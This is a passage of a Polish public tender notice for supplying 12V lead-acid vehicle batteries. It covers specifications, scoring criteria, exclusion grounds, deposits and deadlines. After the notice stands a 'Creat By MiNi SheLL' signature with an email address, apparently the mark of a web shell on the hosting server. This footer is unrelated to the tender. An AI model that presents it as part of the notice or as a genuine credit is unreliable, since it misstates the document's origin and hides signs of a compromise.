kwasowo-ołowiowa -napięcie: 12V -pojemność: nie mniej niż 70AH -prąd rozruchowy: nie mniej niż 570A<br/>Wymiary: - długość 250 mm +/- 10mm - szerokość165 mm +/- 10mm - wysokość195 mm +/- 10mm Polaryzacja - L+ (lewy plus) Data podukcji: nie poźniejsza niż sześć miesięcy od dnia dostarczenia&#34;<br/>5. &#34;AKUMULATOR 12V -technologia: kwasowo-ołowiowa <br/>-napięcie:12V<br/>-pojemność: nie mniej niż 70AH<br/>-prąd rozruchowy: nie mniej niż 540A<br/>Wymiary: -długość 270 mm +/- 10mm -szerokość 173 mm +/- 10mm - wysokość 222 mm +/- 10mm Polaryzacja - P+ (prawy plus) Data podukcji: nie poźniejsza niż sześć miesięcy od dnia dostarczenia&#34;<br/>6. &#34;AKUMULATOR 12V - technologia: kwasowo-ołowiowa <br/>- napięcie: 12V<br/>- pojemność: nie mniej niż 100Ah<br/>- prąd rozruchowy: nie mniej niż 720A<br/>Wymiary:<br/>- długość 330mm, +/- 10mm<br/>- szerokość 173mm, +/- 10mm<br/>- wysokość 240mm, +/- 10mm Polaryzacja - L+ (lewy plus) <br/>Data podukcji: nie poźniejsza niż sześć miesięcy od dnia dostarczenia&#34;<br/>7. AKUMULATOR 12V - technologia: kwasowo-ołowiowa - napięcie: 12V - pojemność: nie mniej niż 77Ah - prąd rozruchowy: nie mniej niż 760A <br/>Wymiary:<br/>- długość 278mm +/- 10mm<br/>- szerokość 175mm +/- 10mm<br/>- wysokość 190mm +/- 10mm Polaryzacja - L- (lewy minus) <br/>Data podukcji: nie poźniejsza niż sześć miesięcy od dnia dostarczenia<br/>   &#34;<br/>8. &#34;AKUMULATOR BR-AB.1234.01<br/>- napięcie: 12V<br/>- pojemność: nie mniej niż 34Ah<br/>- prąd rozruchu wg EN: 1700A +/- 200A Wymiary<br/>- długość 25cm +/- 10mm<br/>- szerokość 9,5cm +/- 10mm<br/>- wysokość 15cm +/- 10mm<br/>Data produkcji - nie poźniejsza niż sześć miesięcy od dnia dostarczenia&#34;<br/>Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 i 4 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34300000-0 - Części i akcesoria do pojazdów i silników do nich</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamówienie będzie realizowane z wykorzystaniem prawa opcji. Opcja polega na powtórzeniu tego samego asortymentu dla ilości maksymalnych określonych w SWZ. Zamawiający informuje, ze opcją jest różnica pomiędzy ilościami maksymalnymi <br/>i minimalnymi.<br/>2.	Zamawiający przewiduje realizację przedmiotu umowy dla ilości minimalnych w całości. Ilości maksymalne, stanowiące górną granicę potrzeb Zamawiającego (będące opcją) są określone w załączniku nr 1 i 2 do umowy.<br/>3.	Zamawiający informuje, ze jeśli ilość minimalna jest równa ilości maksymalnej oznacza to, że dla danej pozycji asortymentowej nie stosuje się prawa opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty w części zamówienia nr 1, 2 Zamawiający będzie się kierował następującymi kryteriami:<br/>1) Cena brutto oferty dla ilości minimalnych- 60%<br/>2) Przyjęty do realizacji termin dostaw dla ilości minimalnych - 40%<br/><br/>2.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczona według wzoru:<br/>P = K1 + K2 <br/>P – Łączna liczba punktów uzyskanych przez daną ofertę.<br/>K1 – Liczba punktów uzyskana przez daną ofertę w kryterium „Cena brutto oferty dla ilości minimalnych”.<br/>K2 – Liczba punktów uzyskana przez daną ofertę w kryterium „Przyjęty do realizacji termin dostaw dla ilości minimalnych”.<br/><br/>3.	W kryterium „Cena brutto oferty dla ilości minimalnych” zostanie zastosowany wzór:<br/> najniższa oferowana cena brutto oferty dla ilości minimalnych <br/> Liczba punktów = -------------------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej dla ilości minimalnych<br/><br/><br/>W kryterium „Przyjęty do realizacji termin dostaw dla ilości minimalnych” oferta uzyska:<br/>WARIANT I - 40 pkt, gdy termin dostawy dla ilości minimalnych będzie wynosił od 5 do 7 dni roboczych od dnia złożenia zamówienia przez Zamawiającego<br/>WARIANT II - 30 pkt, gdy termin dostawy dla ilości minimalnych będzie wynosił od 8 do 10 dni roboczych od dnia złożenia zamówienia przez Zamawiającego<br/>WARIANT III - 20 pkt, gdy termin dostawy dla ilości minimalnych będzie wynosił od 11 do 13 dni roboczych od dnia złożenia zamówienia przez Zamawiającego<br/>WARIANT IV - 10 pkt, gdy termin dostawy dla ilości minimalnych będzie wynosił do14 dni roboczych. od dnia złożenia zamówienia przez Zamawiającego<br/>WARIANT IV - 0 pkt, gdy termin dostawy dla ilości minimalnych będzie wynosił do15 dni roboczych. od dnia złożenia zamówienia przez Zamawiającego<br/><br/>Wykonawca spośród przedstawionych terminów dostaw wybiera jeden wariant dostaw(odpowiednio dla części zamówienia) i stosowną informację zamieszcza <br/>w tabeli w pkt 6 formularza ofertowego (zał. nr 2 do SWZ) <br/><br/>UWAGA:<br/>	Minimalny termin realizacji dostawy nie może być krótszy niż 5 dni roboczych od dnia złożenia zamówienia przez Zamawiającego .<br/>	Maksymalny termin realizacji dostawy nie może przekroczyć 15 dni roboczych od dnia złożenia zamówienia przez Zamawiającego do dnia dostarczenia do magazynu wskazanego w opisie przedmiotu zamówienia.<br/>	Za dzień roboczy Zamawiający przyjmuje dni od poniedziałku do piątku<br/>	Zaznaczenie więcej niż jednej rubryki spowoduje odrzucenie oferty<br/>	Brak wypełnienia spowoduje uznanie przez Zamawiającego, że dostawa będzie wykonana w terminie do 15 dni roboczych, i w związku z czym Wykonawca otrzyma 0 pkt.<br/>4.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>5.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>6.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przyjęty do realizacji termin dostaw dla ilości minimalnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) W celu wykazania braku podstaw wykluczenia z postępowania o udzielenie zamówienia publicznego, Zamawiający żąda złożenia oświadczenia Wykonawcy, o którym mowa w art. 125 ust. 1 ustawy Pzp, potwierdzającego brak podstaw wykluczenia na podstawie art. 108 ust 1 oraz art. 109 ust. 1 pkt 4), 5) i 7) ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego zgodnie ze wzorem – ZAŁĄCZNIK NR 3 SWZ (Rozdział II oświadczenia).<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w ust. 1 składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokumenty te potwierdzają brak podstaw wykluczenia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium dla części zamówienia nr 1,2.<br/>1) Przystępując do postępowania Wykonawca zobowiązany jest do wniesienia wadium<br/>w wysokości:<br/>– dla części zamówienia nr 1 – 7 450,00 PLN, <br/>– dla części zamówienia nr 2 – 440,00 PLN.<br/>Wadium musi być wniesione przed upływem terminu składania ofert i utrzymane nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa , o którym mowa w art. 125 ust. 1 ustawy Pzp, potwierdzającego brak podstaw wykluczenia na podstawie art. 108 ust 1 oraz art. 109 ust. 1 pkt 4), 5) i 7) ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Dokumenty te potwierdzają brak podstaw wykluczenia.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia należy ustanowić pełnomocnika do reprezentowania ich w postepowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być dołączone do oferty (oryginał lub kopia potwierdzana za zgodność z oryginałem przez mocodawcę). <br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, których oferta zostanie uznana za najkorzystniejszą, przedłożą umowę regulującą współpracę tych Wykonawców, w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osoby uprawnione do reprezentowania Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy w przypadku: <br/>1)	zmiany przepisów prawnych, mających wpływ na wykonanie przedmiotu zamówienia;<br/>2)	zmiany wysokości wynagrodzenia w sytuacji, gdy nastąpi urzędowa zmiana stawki podatku VAT; <br/>3)	wystąpi konieczność zmiany umowy na podstawie art. 455 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-10 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1185515</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-10 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-08</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagany termin wykonania zamówienia: Dla części zamówienia 1-2 - 1 miesiąc od daty zawarcia umowy z zastrzeżeniem, że nie później niż do 30.11.2025 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com